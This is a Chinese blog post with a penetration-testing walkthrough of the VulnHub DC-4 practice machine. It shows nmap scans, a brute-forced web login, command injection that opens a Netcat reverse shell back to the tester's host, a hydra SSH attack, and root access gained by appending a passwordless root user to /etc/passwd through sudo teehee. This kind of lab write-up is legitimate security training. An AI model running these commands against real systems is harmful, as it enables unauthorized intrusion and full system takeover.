vulnhub-DC-4靶机渗透记录

已于 2022-07-25 22:18:53 修改
阅读量215 收藏
点赞数 2
分类专栏: 渗透测试 文章标签: web安全 安全
于 2022-07-02 16:21:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nareku/article/details/125559556
版权

浅浅记录一下

准备工作

将靶机导入vm,设置成NAT模式

靶机IP:未知

kail的IP:192.168.178.134

信息收集

1.1利用namp来进行ip端口检测

nmap -sS 192.168.178.134/24

 可以检测到ip为192.168.178.132的靶机,并且开放了22端口和80端口

再用nmap对所有的端口扫一下

nmap -sV -p- 192.168.178.132

弱口令爆破

访问一下80端口,发现是一个登陆界面(第一直觉就是弱口令爆破,因为是admin后台管理系统,所以感觉账户名的话就是admin了,不过再看其他师傅的wp讲到这个弱口令爆破的时候突然解开了之前很不理解的一个关于弱口令的疑点,只能说 好!好!开心!)

 但是还是习惯性扫一下后台,没什么其他有用的页面

 弱口令爆破,可以看到密码就是happy啦(这里的话我只设这一个password变量,换了几个字典才爆破出来呜呜呜)

登录一下后台看看 

 随便点点看

这里没什么思路,看其他师傅的wp说可以通过抓包来更改命令(写wp发现对select这个词的敏感度还不够高哈哈哈)

 利用Netcat反弹shell

先在 kail中开监听端口9999

nc -lvp 9999

然后再在bp里面输入反弹命令shell

nc -e /bin/sh 192.168.178.134 9999

  使用python 通过pty.spawn()获得交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

进入home文件目录下,发现有三个文件,都进入看看(眼熟一下这几个名字哈哈哈)
 

发现在 jim 文件下找到了密码的备份文件,先将它保存在psw文本下(这里是手动crtl+shift+c下来的)

Hysra爆破

用hysra爆破jim用户密码(上面的弱口令爆破也可以利用hysra进行admin用户密码爆破)

hydra使用在线破解的方式进行账号密码认证,通常有一下几种情况:
1.用户名未知,密码未知。2.用户名已知,密码未知。3.用户未知,密码已知。

hysra -l jim -P psw -t 4 ssh://192.168.178.132

-l   后面紧接着具体指定的用户名

-L  后面紧接着指定的多个用户名,参数值为存储用户名的文件的路径(建议为绝对路径)

-P 后面紧接着密码字典

-t  指定爆破时的任务数量(可以理解为线程数),默认为16

浅浅等待        

得到了jim用户的密码是jibril04

使用ssh来进行来连接试试

ssh jim@192.168.178.132 -p 22

 看到这里说有一个邮件,接下来就是要找一下这个邮件

 最后在/var/mail 中找到了这个邮件

 给了一个charles用户的密码

切换到charles用户,看看里面都有写什么,发现cat权限不够,想必其他的也不行哈哈哈哈

接下来应该就是提权了

权限提升

看看当前我们有什么权限

sudo -l

 可以看到teehee用户,该用户可以以root权限免密码执行 /usr/bin/teehee,可以利用teehee来提权

使用teehee命令将一个无密码用户admin写入到/etc/passwd文件,并加入到root组中

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

切换到admin用户就有root权限了

 详细的总结 明天再补啦 

参考:你终于回来了(。・∀・)ノ (cnblogs.com)

CTF-DC4靶机攻防 - 简书 (jianshu.com)

narukuuuu
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机DC系列-DC-4
m0_54525483的博客
01-04 680
Vulnhub靶机DC系列-DC-4 靶场名称:DC-4 下载地址: DC-4.zip (Size: 617 MB) Download: http://www.five86.com/downloads/DC-4.zip Download (Mirror): https://download.vulnhub.com/dc/DC-4.zip Download (Torrent): https://download.vulnhub.com/dc/DC-4.zip.torrent ( Magnet) V
靶机实操:vulnhub-DC4
不想当脚本小子的脚本小子
12-07 177
照例先信息收集:IP:192.168.249.137 开放了22ssh端口以及80端口,web服务器的nginx1.15.10,主界面是一个登录框(能否sql注入?能否暴力破解?)。 看看 ngnix有没有什么漏洞,发现没有: 扫后台也没得到什么有效的信息: 看看网页源码有没有什么提示,还是没有什么有价值的,那就只能直接爆破了,这里我使用burpsuite来抓包爆破 这里我使用的是john里面的字典,因为我觉得一个靶机可能,不值得一个几十个G的密码字典来爆: 最后登录成
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 400
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
vulnhubDC4靶机
LainWith的博客
08-15 1032
靶机概览信息收集nmap信息收集爆破后台使用字典爆破登进后台命令注入漏洞敏感信息收集SSH爆破SSH登录提权创建一个管理员以管理员身份登录 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-4,313/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC3的MAC,这样做主机发现时可以通过.
vulnhub系列靶机--DC4
cyzCc的博客
02-23 786
vulnhub系列靶机DC4 1.使用nmap扫描主机ip nmap -sP 192.168.211.1/24 目标靶机的ip为192.168.211.137 2.扫描目标靶机开放的端口服务 nmap -A 192.168.211.137 -p 1-65535 目标靶机开放了22端口和80端口 我们在浏览器上访问80端口 发现一个admin登录框 尝试使用burp爆破,首先找到kali里面...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2363
Vulnhub-DC-4靶机实战
vulnhub靶机-DC4-Writeup
liuhanzhe的专栏
12-08 190
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-4,313/ DESCRIPTION DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily fo
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1832
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4395
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
Vulnhub系列之DC4靶场详解
weixin_50053818的博客
05-09 821
@ [TOC] 环境 vulhub系列之DC4靶场 VMware虚拟机 kali 爆破网站管理员用户拿shell 由目标靶机的Mac地址可以得出靶机IP为`192.168.43.140`.nmap扫描结果得知目标靶机开放了80端口和22端口,所以只能从目标网站下手。直接进入网首页。 根据首页信息可以知道,有admin用户,所以直接用burpsuite爆破,用软件自带密码即可。 爆破成功,密码是happy。登陆进去发现是命令执行,所以直接抓包改数据,反弹shell。 反弹shell成功,是用n
Hydra安装及其用法
热门推荐
littlecjx
12-30 8万+
Hydra对应的英文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP等服务,支持Linux、Windows、Mac平台安装,其中Kali Linux中自带Hydra。 Kali Linux中Hydra Kali是安全从业人员常用的Linux系统,自带有大量安全工具集,Hydra自然也集成在里面,工具位置在密码攻击—在线攻击一栏。 Wind...
【网络安全的神秘世界】docker搭建pikachu靶场
weixin_54750312的博客
05-31 517
再访问80端口,因为默认端口就是80,所以80可省略。可以通过下面命令进入pikachu网站根目录。虽然是404,但实际已经启动好了。点击红色部分,进行安装/初始化。复制命令后,去kali安装。访问本地地址8080端口。
计算机网络——网络安全
最新发布
2303_77543831的博客
06-02 745
网络系统中的硬件,软件及其系统中的数据受到保护。网络安全概述网络安全网络安全计算机网络面临的威胁主要分为两大类主动攻击被动攻击网络系统的特性保密性完整性可用性可靠性不可依赖性加密和交互加密和解密加密手段公匙和私匙对称加密非对称加密数字签名的四大特点防火墙防火墙的区域们
【网络安全的神秘世界】VsCode直连虚拟机
weixin_54750312的博客
05-31 715
连接成功,回到原始vscode界面,可以点击打开文件夹。右击VScode中左下角的绿色区域,勾选远程主机。通过VsCode连接虚拟机,可以进行远程操作。打开远程资源管理器,点击+号,配置连接服务器。再次输入密码后,进入Linux文件夹。hostname:主机名,随便起。host:打开kali,用。User:虚拟机的用户名。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值